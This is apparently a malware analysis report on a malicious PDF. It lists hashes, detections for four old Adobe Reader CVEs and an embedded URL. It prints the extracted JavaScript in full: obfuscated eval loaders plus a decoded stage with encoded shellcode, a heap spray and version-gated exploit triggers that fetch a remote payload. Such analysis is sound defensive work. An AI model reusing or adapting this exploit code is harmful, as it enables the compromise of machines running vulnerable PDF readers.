Malicious PDF — malware analysis report

Static analysis result for SHA-256 d01bcce102932c44…

MALICIOUS

PDF

10.2 KB Created: 2010-06-06 12:37:42 Authoring application: Saqmosiwaneho (via 8df87Ceyfimewoje) First seen: 2012-07-12
MD5: 42d35ecdb980c50ed1ad2bebeb0302dc SHA-1: a9694277a3a68fcd080199b16bc800089f3322bc SHA-256: d01bcce102932c448c524d8296e5275b1110496c209244e60432b126cd2e3e81
410 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 10

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
  • Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927
    PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
  • Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCH
    A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than the independent API-keyword findings above: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) referenced each URL.
    URL http://ahrudb.egh/4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0018_000.js pdf-javascript-stream PDF /JS object 18 at offset 0x1A2A 4192 bytes
SHA-256: 2e76c23f50f40d730a485a5b4df0a6c1ae4b35f531c235a2f9c0e12351b2e6d7
Preview script
First 1,000 lines of the extracted script
try {
var zYNU=new Date();var zO=new Date();var dY=false;
cFQ="'/2/# 2D2E&L#E2T@E# 2P&A@G@E!S& #W&I@T#H@O&U2T& !T2E!X#T2 !f&r@o&m# #t2h@e! !P@D@F! !d&o!c&u2m&e2n#t#\\!r!\\@n&/#/# #I&M2P@O!R2T2A2N&T!:2 2T&h@i&s2 @s@c!r!i@p!t@ #a2s#s2u&m#e#s& !t@h!a&t! @p!a&g2e& &i!s2 2b2l@a#n&k@ #i!f2 !i2t! &d!o@e#s& 2n@o@t# 2c&o@n@t&a@i2n# &a@n2y# #\\#\"@p&d@f2 2w2o&r!d!s!\\!\"2\\2r2\\#n!\\2r&\\!n#t&r!y# &{@\\#r@\\@n!\\&r2\\!n2!f&o2r& &(#v!a#r& 2i# !=2 #0@;2 @i& #<@ ! #t!h#i&s2.!n@u@m2P@a#g!e#s&;& !i&+@+&)# @\\@r!\\&n!!{2\\#r&\\&n!#&n@u#m2W!o@r&d2s# !=# 2t#h2i&s#.#g@e#t@P#a&g&e#N&u&m&W&o!r&d!s!(&i2)2;!\\2r#\\!n2!#i2f2 @(#n2u&m&W#o!r#d2s2 !=!=@ !0&)! #\\@r&\\&n@22{2\\#r2\\@n##&!t@h@i&s!.!d&e!l2e#t#e2P@a#g#e2s#(@i&,&i#)2;&\\&r@\\2n@!2}#\\#r@\\#n##}!\\&r&\\@n!\\2r2\\2n#}#\\@r&\\@n&c@a#t!c@h2(@e#)2\\#r!\\#n#{@\\!r#\\2n!}&'.replace(/[&2\!#@]/g, '')";
hM={};this.zAN='';
mHI='v:akr: :okNk=jf?u|n|c:tjijokn|(:u:F?,jtkGk,kq:J|,ki?L?,kekD|)?{:r:e?tkujr|nk :u?F|[:nkekw| jSktjr?i?n?g?(|\"ksju:\"?+?\"|bjsj\"?+?\"?t|r|\"|):]:(jt?G:,jq|Jk,:i?L:,?ejD?)?;|}|;:v:akr? ?djG|=kS?tjr?i:n:gk(ko?N|(|\":f|r|ojm?H?6kI:a?\"k,?0|,:4:)|+?\"jCjhja|r|\"|+kojNk(j\"|C?o|d:ekw|7kNjE|\"k,j0|,?4k):)?;:vkajrj :wjF:=k\'|g|_ke|1|t:YkPk1:a?_?g?4:e?_|N?1?ujz:mk_:Wj_?ojY?rjYjd?1:s|4|\'|.:r?e|pjlja|cke?(|/?[:4?Y|1|z|_k]j/:g:,j |\'j\'?)?;?vja:rj :n?S|=?3?2|-j3:1|;jv|a?r| :i:P:=?1k0k0|-:1?0:0?;kvka?r: :t?M|=j\":\":;:v?a|r: kl|Q:=|tjhki:s:;jv?a?r: kgkH:=:\'|gk;:e?2?t:;:P?)jak(|gk;jek;?Nj)jt?J:h:):Wj)jo:;jr?)jdj;j\':.kr?e:p?l|a|c?ek(|/|[k;k2|J|\\k)?\\:(|]:/?gk,: k\'k\'j)|;?v:a?r| jpjY?=jS|tkrki?n?gk(:\"js|u?b:\"|+k\"?s?t:r|\"k):;|vkajr| ji|LkE|=kS:tkrkikn|gk;|v|a:r| ?okD:=?2j6:-j2|4:;|v:a?r? :zkYk=j3j+j1j3?;|v|a?r? |c|F?=k5?;jvka:rk kb|K|Vj=jt|h:i:s|[?nke?w: jS|t?r|i?njgk(?\"kp:a?r:s:e?\"k+:\"jIjn|t?E?6j5k\"?.?sju?b|s?tjr?(:0:,:3j)|)?]?;:v?a|r? ?f|Oj=:\"|%?C|AkVkg|\":.|s?ukbks?t:rj(|0:,?1|)|;:v?ajrk jgkJ?=:2:;kf:u:njc:t|i|ojn? jvj(?b|U?,:n|Ek,|s:X?):{:v?a|r| ko|F:=:\'k\'j;jf|o?rk(:vja?r: :f|Ck=:n|E?;kfkCj<?nkE:+|skX|;|f?Ck+?+j)?{ko?F?+j=:bkU?[:fkCj]k;j}jrkejtku:r|n: ?o?F|;|}k;|v?akr? jsjX?=jS?tkrkijn?g?(|okN?(k\"|ljejv:LkM:\"?,|0|,?2|)|+kokN:(:\"kz:T?a|skn:g:T|skzkak\"j,k4|,k2k)j+?ojNj(|\"?tjh:Pjo?x|\"|,j0:,|2k)j)|;kvja?r: :w|H?=?\":ekv?\"|+?ojNj(|\"jakl:8:y|K?7|\"k,|0:,?2?)j;|v?ajr? 
:h?U|=k\'jc?m?h|mkaj9:r?9?C?Rko?9|dj>:ekmjA|m|tkqj\'j.?rje?p:lja?c?e?(j/|[kq?R?\\?>km?9:]|/|gj,| |\'?\':)k;|v|ajrk ?wjNj=j\"ks:u|bjs:\"|+k\"jt?rji?nk\"j+k\":g?\"j;?;jf?ujn:c?t?i?ojnk :t:S|(|g|F|,kikL:,je?Dk)|{:t:Mk=:t:M?+:g|F?}j;kv:akrj :t?=kn|e?w: ji|LkEk(k)k;?f:u:n|c?t|i|o|n: kb?Sj(|g:Fj,jikLj,je?Dk):{:v|a:rk :u|X?=?rj(:gkF:):;:r|e|tkujr:n: kb:KkJj(|z?Y?N?(jgkFj,|u:X?):)j;k}|f?u?n:c|t|ijo|n: |b:K?J:(|g:Fk,:ijL?,kejDj)k{?v?a?rj ?g|F:=|bkK:Vk(jgjF?,:zjYj)j;|gkF:=jtjE:(kgkF:)?;|g|F?=?q|X|(ki|LkE:,|d|G|)k(?g?F?)?;|rke?t|ujr|nj |gjF:;j}?r:Cj=|f?u|n:c?tji?ojn:(jt?Ak,:x:A|,?i:L?,:e|Dk)j{kr:ektku|rjn: jtkA|+kx:A|}j;kvja?r| kojL:=?l:Qj[kwjF?]k(jgjJk)|;:v?a?r: jxkA:T?=|l?Q|[kw|H?]:;:fju?n|c|t?i|okn? ?r?(jr?Ej,|ikL?,kekDk)?{jrkejtjujrkn: jrjE:[|s?Xk]k-?okD?}:;jy:P?=jfkujn:cjt:i?o:n?(ktjA?,kxkA|,?ikL:,|e|D:)k{:r:ektjujrjnk kt?Ak-kx?Ak}k;:fju?n?cjtkijo|n| khkAkJ|(|f?C:,ji|Lk,:e:Dk)k{?rje:t:ukr:nk kl|Qk[kg?H:]?(jgkJk,|f|Cj):}?;jzkYjN:=kf|ukn|c|tji|oknj(?r?E|,:p:S:,:i:L|,|ejDj)?{?rke:t?u:rknk |v:(:rjEj,|p:S|,jokDk)?}j;|w:P?Wk=jf:u:njc|t?ijokn?(:b|Uk,|p:Sk,ki:L|,|ejD?):{?r|e:t|u:r:nk ?b|U?[:hkUk]|(:p:S|)?}k;?f:u?n|c|t|i?o:n| |qkX|(?rkEk,kcjNj,ki?L:,ke?D?)k{|rkejt?ukr?n: |rjEk[|ckN?]?}?;:f?u|n?c|t|ikokn? kz?Ej(?g?F?,:ijL|,ke?Dj)?{?rje?t:ujrjnk jfkO?+kg|Fk}|;:f?u:n|c|t?iko:nk ?t|E?(:y|V:,?x|AkNj,:i|L?,|e|D?)|{jr|e|t|ukr:nj ?ykV?^|c|Fj;j}k;:;?f:u|n?cktji?ojnj :b?W:(jf?Cj,:i?Lk,?ekD?)?{kv?a:r: :gjHkK:=|hkA?J|(:fjC?)j;|gkHkK:=?b|S?(?g:HkK?)|;?r|ejtkujr?n? ?g|HkKj;:}kvka?rj :w?Bk=|ijP:;|f:okr?(jwkB:=?i?Pj;?wkB|<jo|L:;kwjB|+j+:)j{jt|S|(:bjWj(kw?Bk)k)?;?}:;|x:A:Tj(kt?Mj):;?'.replace(/[\?\|j\:k]/g, '');
var dA={jK:false};
gJY=this["ap"+"pkQA".substr(0,1)];
nU=18294;nU+=149;sT=27837;sT+=104;
kRU=gJY["evalkwH".substr(0,4)];
var wBM=[];var mV=[];
kRU(cFQ);
var zANW='';var mJ={};var sL={aN:"jW".charCodeAt(1481)};
gR=vM;
var kR=["sXO","yN","jU"];
} catch(gFA){
this.wHW="wHW";this.tY="tY";
kRU(mHI);
this.hW=11206;this.hW++;
}
page_word_xor_stage_000.js deobfuscated-js page-word hex-tail XOR decoded JavaScript (decompressed, key=0x05) at offset 0x7BF 3048 bytes
SHA-256: 92967d05b7d23457bdba7402c548bef41194b3274206bd604239266a78cc1e74
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var uL='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/.:_-?&=%#', h=this.info.author.replace(/[\s]/g, '');var d = (this.info.producer.substr(0,5) == 'debug');var f = new Array();function fY(gN){var z = p();var b = hA();z += ((z.indexOf("?") > -1) ? "&" : "?") + "reader_version=" + b;if(d) app.alert("URL: " + z);z=mN(z);var t="%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";t+=z;return unescape(t);};function p(){var bU = this.info.title.replace(/[\s]/g, '');if(d) app.alert("DEST_TABLE: " + h);var oF = n(bU, h, uL);return oF;};function n(bU, uL, h){var oF="";for(var i=0; i < bU.length; i++){var bK = uL.indexOf(bU[i]);if(bK > -1 ){oF += h[bK];}}return oF;};function mN(bU){var out = "";bU = wP(bU);g = Math.round(bU.length / 4);if (g != bU.length /4) bU+="00";for(var i=0; i < bU.length; i+=4){out+="%u" + bU.substr(i+2, 2) + bU.substr(i, 2);}return out;};function wP(s){var i, f = 0, a = [];s += '';f = s.length;for (i = 0; i<f; i++) {a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();}return a.join('');};function zA(cB, ez5pL6){while (cB.length * 2 < ez5pL6){cB += cB;}cB = cB.substring(0, ez5pL6 / 2);return cB;};function pU(aD){var qPBt7D = 0x0c0c0c0c;x = fY("pdf");if (aD == 1){qPBt7D = 0x30303030;}var l = 0x400000;var tsSzSc = x.length * 2;var ez5pL6 = l - (tsSzSc + 0x38);var cB = unescape("%u9090%u9090");cB = 
zA(cB, ez5pL6);var x62RaBM3 = (qPBt7D - 0x400000) / l;for (var xA = 0; xA < x62RaBM3; xA ++ ){f[xA] = cB + x;}};function hA(){try {return app.viewerVersion.toString();}catch(sB){    return 0;}}function tM(){   var b = hA();if(d) app.alert("Acrobat Version: " + b);if (b > 8){if(d) app.alert("Run util.printf exploit.");pU(1);var qD = "12999999999999999999";for (tA=0; tA < 276; tA++){qD += "8";}util.printf("%45000f", qD);}if (b < 8){if(d) app.alert("Run Collab.collectEmailInfo exploit.");pU(0);var sN = unescape("%u0c0c%u0c0c");while (sN.length < 44952) sN += sN;this .collabStore = Collab.collectEmailInfo({ subj : "", msg : sN});}if (b < 9.1){if (app.doc.Collab.getIcon){if(d) app.alert("Run Collab.getIcon exploit.");pU(0);var tI = unescape("%09");while (tI.length < 0x4000) tI += tI;tI = "N." + tI;app.doc.Collab.getIcon(tI);}}if (b == 9.2){if(d) app.alert("Run media.newPlayer exploit.");pU(1);var sf="1.000000000.000000000.1337 : 3.13.37";util.printd(sf, new Date());try {media.newPlayer(null);} catch(e) {}util.printd(sf, new Date());}};tM();